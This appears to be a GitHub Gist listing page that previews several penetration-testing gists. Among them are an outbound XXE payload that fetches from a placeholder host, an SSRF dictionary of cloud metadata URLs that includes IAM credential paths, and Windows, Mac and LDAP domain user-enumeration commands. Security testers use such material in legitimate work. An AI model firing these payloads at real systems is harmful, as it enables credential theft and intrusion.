Using Requests and Beautiful Soup, with the most recent Beautiful Soup 4 docs.
Install our tools (preferably in a new virtualenv):
pip install beautifulsoup4
Vishwaraj Bhattrai vishwaraj101
bradmontgomery
/ ShortIntroToScraping.rst
Created
February 21, 2012 02:00
Really short intro to scraping with Beautiful Soup and Requests
securitytube
/ CheckS3.py
Created
April 10, 2013 10:51
CheckS3.py - Prints all the files with public-read enabled.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Author - Vivek Ramachandran | |
| # | |
| # Website - http://securitytube.net | |
| # | |
| # Python for Hackers: http://securitytube-training.com/online-courses/securitytube-python-scripting-expert/ | |
| # | |
| # License: Use as you please for non-commercial purposes. | |
| # |
subudeepak
/ WebSockets.md
Last active
May 31, 2024 09:36
The problems and some security implications of websockets - Cross-site WebSockets Scripting (XSWS)
WebSockets is a modern HTML5 standard which makes communication between client and server a lot more simpler than ever. We are all familiar with the technology of sockets. Sockets have been fundamental to network communication for a long time but usually the communication over the browser has been restricted. The general restrictions
- The server used to have a permanent listener while the client (aka browser) was not designated any fixed listener for a more long term connection. Hence, every communication was restricted to the client demanding and the server responding.
- This meant that unless the client requested for a particular resource, the server was unable to push such a resource to the client.
- This was detrimental since the client is then forced to check with the server at regular intervals. This meant a lot of libraries focused on optimizing asynchronous calls and identifying the response of asynchronous calls. Notably t
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
cutaway
/ extract_java_server_faces_viewstate.py
Last active
June 25, 2021 08:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Name: extract_java_server_faces_viewstate | |
| Purpose: Extract and parse the Java Server Faces viewstate | |
| Date: 20150620 | |
| Author: Don C. Weber (@cutaway) of InGuardians, Inc. | |
| Resources: | |
| http://wiki.apache.org/myfaces/Secure_Your_Application |
BuffaloWill
/ cloud_metadata.txt
Last active
June 25, 2024 11:51
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
- How to Build a Successful Information Security Career (Daniel Miessler)
- The First Steps to a Career in Information Security (Errata Security - Marisa Fagan)
- Hiring your first Security Professional (Peerlyst - Dawid Balut)
- How to Start a Career in Cyber security
- How to Get Into Information Security (ISC^2)
- https://www.isc2.org/how-to-get-into-information-security.aspx
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From: http://redteams.net/bookshelf/ | |
| Techie | |
| Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp. | |
| Social Engineering: The Art of Human Hacking by Christopher Hadnagy | |
| Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam | |
| The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick | |
| Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others. | |
| Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor | |
| The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors |
its-a-feature
/ Domain Enumeration Commands
Created
January 7, 2018 21:03
Common Domain Enumeration commands in Windows, Mac, and LDAP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Domain: TEST.local | |
| User Enumeration: | |
| Windows: | |
| net user | |
| net user /domain | |
| net user [username] | |
| net user [username] /domain | |
| wmic useraccount | |
| Mac: | |
| dscl . ls /Users |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Usage : ./scanio.sh <save file> | |
| # Example: ./scanio.sh cname_list.txt | |
| # Premium | |
| function ech() { | |
| spinner=( "|" "/" "-" "\\" ) | |
| while true; do | |
| for i in ${spinner[@]}; do | |
| echo -ne "\r[$i] $1" |
OlderNewer